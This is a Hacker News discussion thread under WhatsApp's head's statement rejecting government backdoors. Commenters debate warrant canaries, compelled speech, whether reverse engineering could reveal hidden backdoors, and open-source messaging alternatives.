Hacker News new | past | comments | ask | show | jobs | submit login

We were surprised to read this story and are not aware of discussions that would force us to change our product.

We believe people have a fundamental right to have private conversations. End-to-end encryption protects that right for over a billion people every day.

We will always oppose government attempts to build backdoors because they would weaken the security of everyone who uses WhatsApp including governments themselves. In times like these we must stand up both for the security and the privacy of our users everywhere. We will continue do so.

Will, Head of WhatsApp




Will you have something like a warrant canary [1] to let users know in case there ever is a compromise of security?

[1] https://en.wikipedia.org/wiki/Warrant_canary


A warrant canary isn't proof of anything.


Can you add some substance to this? Why do you think warrant canaries are weak?


Warrant canaries haven't been tested in court. (They have been used as notification of an NSL though.) In particular, judges are human beings, not robots, so the laws are interpreted and implemented by humans. Because they're not robots, removing a warrant canary toes the line on communicating to the affected, in violation of an NSL. Thus, removal of the canary most likely means an NSL was received, but the canary staying up doesn't necessarily mean that there wasn't an NSL. Lawyers at every organization have considered the situation and advised their client, but those lawyers are not at the FBI.


I don't think you're meant to remove warrant canaries when you get a secret court order, you're just meant to continue renewing your warrant canary at a regular interval as long as you don't get a secret court order.

My understanding is that they can prevent you from removing warrant canaries but they can't force you to continue announcing "I have not received a secret warrant".


Tactically, warrant canaries are dead-man switches. Conceptually, you can't compel someone to explicitly lie publicly.


But the FBI could advise the canary poster that not continuing to post the canary notice could lead to legal action (esp. since that person has willfully put him/herself into the situation). Then it would be up to the recipient of the NSL to decide if it’s worth that risk, which is as stated above, untested. It’s a fine line between telling them to lie versus telling them the ruse could be in violation of the gag order.


Conceptually you can't because you can put as a citizen any requirement to make a canary that the law cant compel you to do. For example, you can pay to publish the canary: the state can't compel you to spend money on it. Or you can make a small petty crime with it (say, an IP Violation).

In places where there are limits to what the government can do to an with you, its possible to resist.


Why are you arguing about what is conceptually possible? The reality is such that people can absolutely be compelled to lie in public, especially for "national security" means. It happens all the time. Failing to update could signal something, but continuing to update means nothing. "Resistance" and other such concepts don't hold up to scrutiny against shareholders and 40 year sentences.


“Compelled Speech“ has been tested in the Supreme Court.

EX: https://en.m.wikipedia.org/wiki/West_Virginia_State_Board_of...

The US government can’t legally compel you to lie, but may restrict what you can say.


Because thinking otherwise is saying that nothing really matters, the government can do anything at any time and you are toast no matter what.


The truth is in the middle for all nations on this earth. Adopting reality as a context is not nihilism.


Well... that might be true. In the words of George Orwell: https://www.youtube.com/watch?v=iP3T5tEs7yI


Welcome to the real world, kid. Population: all of us damned souls.


The constitutionality of whether the US Government can force someone to update a warrant canary has never been tested. Until it is, it’s foolish to declare with certainty whether it is or is not legal. We can only speculate at best.

We know that the legal bar for forcing someone to speak or not speak is high (compelling state interest), but national security has usually been held to pass such a bar.


If you can be compelled to be silent while breaking constitutional guidelines on the basis of national security, you can be compelled to update a beacon.

Warrant canaries are nice to have, but viewing them as something which provides proof of absence of government meddling is incorrect.


Perhaps, but that legal theory has never been tested in US federal court (as far as we know). It's entirely possible that the judicial branch wouldn't allow the executive branch to force private citizens into actively making false statements.


Right. My whole point is that there are unknowns in the equation which render the proposition void.


A lack of one is.


I've often wondered whether or not a sufficiently well worded warrant could require that the warrant canary remains published unchanged, rendering the warrant canary useless.


The idea behind the canaries is that they expire, and that one cannot legally force someone to sign false statements. So if no new canary is published when the old one expires, that's a red flag.


Please. A receipt for a $10 wrench and any IT guy will crumble.

That wouldn’t even be illegal, since they never hit you with a wrench - you just imagined they were about to go xkcd on you


If so, sounds like someone from FB Legal and the SEC should have Words with Bloomberg. Wouldn't be the first time they've intentionally maliciously misrepresented/lied about an infosec issue to the detriment of a company in order to move the market (Supermicro "grain of rice"...)


Looks like more crappy security reporting from Bloomberg: https://twitter.com/alexstamos/status/1178308065268920320


If you read the (short) story to the end, you will see it was first reported by the New York Times.


The reporting is accurate.


"are not aware of discussions that would force us to change our product."

It reads like your product is already compatible with govt ease dropping


Ha, at first I thought you were making a joke that WhatsApp could have been aware of the conversations by ... eavesdropping on the government employees who are using WhatsApp.


Reminds me of the timeless http://bash.org/?88575


Do you currently have any backdoors installed?


We do not.

You don't have to take our word on this -- I wouldn't want you to. As others on this thread have pointed out it's possible enough to tear through our binaries that if we did have a backdoor it would be discovered.


> it's possible enough to tear through our binaries

No, it's not "possible enough" and I strongly suspect you fully realize that.

A backdoor doesn't need to be in a form of an IF statement or something comparably obvious and silly. It can be a weakly seeded PRNG that would allow a "determined party" to brute-force the key exchange in a reasonable time. That would take man-years to fish out from a binary, and that's without considering that you may (be forced to) distribute an altered binary on demand and to specific targets only.

So in the end all we have - realistically - is in fact just your word. There's no way for you to prove that you are trustworthy by pointing at some random binary. The only option is to distribute reproducible builds from an audited open source.


Distributing an altered binary to specific targets should be impossible as WhatsApp don't control the distribution, Apple and Google do. They would also have to be complicit too for a targeted attack to be feasible. By having to distribute the same binary to everyone it is much harder to conceal a backdoor


Are you sure that there's no way for whatsapp to download and execute some code which will lead to upload of protected information?

Simple example: I'm sure that whatsapp main window is webview. Imagine that application inserts some kind of resource (e.g. CSS) from whatsapp server. So now whatsapp server can serve slightly altered CSS which will leak secret data via custom fonts, etc and you won't be able to find that, unless you're intercepting all traffic and can decrypt it (and apps nowadays love to pin certificates).

This is imaginary attack, I have no idea whether whatsapp does that. But HTML is a powerful and dangerous beast, yet it's used a lot in applications for rich media.


That doesn't help against attacks by US authorities. If they can make Facebook create a backdoor, they can make Apple and Google distribute it.

Signal has the same issue.


Juniper reveled the Screen OS backdoor with a quiet patch over Christmas. Within a month the backdoor was fully understood.


They had a diff, they knew where it was. This helps a lot.


I disagree that it would take man-years to fish that out from a binary. Black hat and white hat hackers do this all the time.


I agree. The crypto used is industry standard, and the actual process all the way from random number generation to deriving a key is relatively easy to follow.

Active ways to attack the client to make it leak the key are far more worrying - but even an open source project wouldn't protect against that.


Again, it may very well be a vanilla TLS, but then you have a bit of code in some obscure corner that repoints random() to an alternative weaker implementation when some conditions are met, including, for example, not being run under a debugger and not having certain popular functions trampolined.

Good luck finding even this without a fine comb. And that's us just getting started with code flow obfuscation.

No source = no trust. It's as simple as that.


Unfortunately, the WhatsApp terms of service say you must not "reverse engineer, alter, modify, create derivative works from, decompile, or extract code from our Services"


In (at least) the US this wouldn't hold up in court if they went after you: https://cr.yp.to/softwarelaw.html.

Of course if WhatsApp detected an abnormal or tampered version of the app, they can suspend or disable your account. I'm sure security labs that do reverse engineering of this sort probably do it on test handsets with burner numbers and identities so it wouldn't affect any personal accounts they use.


Perhaps, I just thought it was an odd thing for the head of WhatsApp to say: You don't have to take our word on this - just do this thing that we prohibit in our terms of service.


Whatsapp is owned by Facebook. Facebook has never been a leader in corporate governance, or even solid moral decision-making.


This should be completely believable for a company that relies heavily on user and community trust.

That said, @wcathcart: in community with deep technical expertise like Hacker News, folks do consider how many possible channels and means there are to confidentially leak information from applications.

You're correct that in the general case it's likely that tech-savvy users would scan a popular app like yours and find any 'obviously-placed' backdoors. It's an observational and opportunistic approach, akin to the way a passer-by might spot a poorly locked bicycle on a street.

Unfortunately there's an extra level of complexity here - any app may have unusual behaviors that a sophisticated attacker could trigger for individual users to exploit them - and it's really, really hard for the security-conscious of us -- who might never see or meet those users -- to truly trust that your app is doing what you tell us it is, whether that's end-to-end encryption in all situations, or anything else.

The reason is that without being able to see how the app is written, verify that it's genuinely the same compiled version running on all devices, and audit the behavior it will have under exceptional circumstances -- external observers just don't know.

I'm not expecting you to make the source freely available, incredible though that would be - but attempting to explain the potential disconnect in dialogue you might find with some commentors.


I'm not sure it wasn't answered before, but why do you refuse to open-source the client app, since, as you say it yourself, you try to have no secrets on the client-side, encryption is supposed to be e2e, technology is well known and implemented in many alternatives and basically there seems to be nothing to protect in the app itself?


Please implement a warrant canary while you still can, before you are legally compelled not to.


> tear through our binaries

That's explicitly against your terms of service.


We now have explicit, written authorization from the head of WhatsApp to reverse engineer ("tear through") the binaries. The ToS only prohibits unauthorized reverse engineering. I agree with you that it was disallowed prior to this comment, but I think it's OK now.


Thanks for your words, but unfortunately I think your hands are tied on this one. Australia was the first pin to fall within then Five Eyes, and I think the rest will soon follow.


Perhaps, but that legal theory has never been tested in US federal court (as far as we know). It's entirely possible that the judicial branch wouldn't allow the executive branch to force private citizens into actively making false statements.

Hassan https://www.clipart.email/


Is it true for US or for every country? How does WhatsApp legally operate in Russia?


It's true in every country. We are a global service, and our policy on backdoors is the same everywhere: we do not have them and we vigorously oppose them.

Sometimes this leads to us being blocked. We were blocked in Brazil, for example, but that block was overturned in the courts.


Thanks! What is your opinion on a rumor that FSB doesn’t have any complaints because they found unintentional/unknown vulnerability that allows them to read WhatsApp messages? Should WhatsApp users be concerned about that?


We do know that phones and tablets are vulnerable - so it's not like we're unaware of any backdoor that may also be used to subvert whatsapp.

It'd indeed be interesting to know if the FSB had some kind of baseband vulnerability that they'd used willy-nilly to facilitate dragnet surveillance.

I suspect William Binney was right though - blanket surveillance is just expensive and hides your needles in a mountain of hay; you really want high quality in the data you store in order to ease extraction of meaningful information / intelligence.

(that's not to say that aggregate meta data isn't interesting - just that with actual content noise is a problem)


So are you saying the backdoors will or won't be introduced to WhatsApp?


Will not. We are completely opposed to this. Backdoors are a horrible idea and any government who suggests them is proposing weakening the security and privacy of everyone.


Will you pull out of UK and US? Seems very unrealistic. You have no choice but to obey the law,even if the law is ridiculous.

Have you considered architectural changes that will allow for the app to be compiled and deployed by an affiliate corp outside of these jurisdictions?


Thanks for the clarity.

So will WhatsApp refuse to comply, if this goes forward?

And is that even possible?

I do appreciate that Facebook has the resources to fight. To fight an NSL, even. But IANAL, and have no clue.


Facebook give the government this and the government in acts regulations to “protect” Facebook. I’m sure Facebook is salivating at the thought at getting even more access to your sensitive data. Once the backdoor is installed who knows who’ll have access.


Thanks.


As much as would like to believe all promises coming from corporate execs - Facebook has been caught lying more than enough. So thanks for trying, but I have uninstalled WhatsApp and I'm happy with Threema.


Have you considered Riot (Matrix) or Signal? Both are open source so it's possible to verify claims made on their website, which is a lot less possible with proprietary software like Threema.


And with Matrix apps you can choose to run your own server. Not sure what legal ramifications that has, but practically speaking it allows the possibility of eliminating another potential weakness.


... but probably opening many new ones, unless one has a really strong security team in place.


These vulnerabilities would then at least be bespoke, particular to a specific server, preventing mass surveillance. At least if you're not talking about potential vulnerabilities in synapse (Matrix server software), but then a strong security team wouldn't help that much.


And? That is what you feel. What guarantees do we have?


Glad you have the packs of the people when the Government doesn't.


>people have the fundamental right to have private conversations

Any comment on this?

https://www.theguardian.com/world/2013/sep/11/nsa-americans-...




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: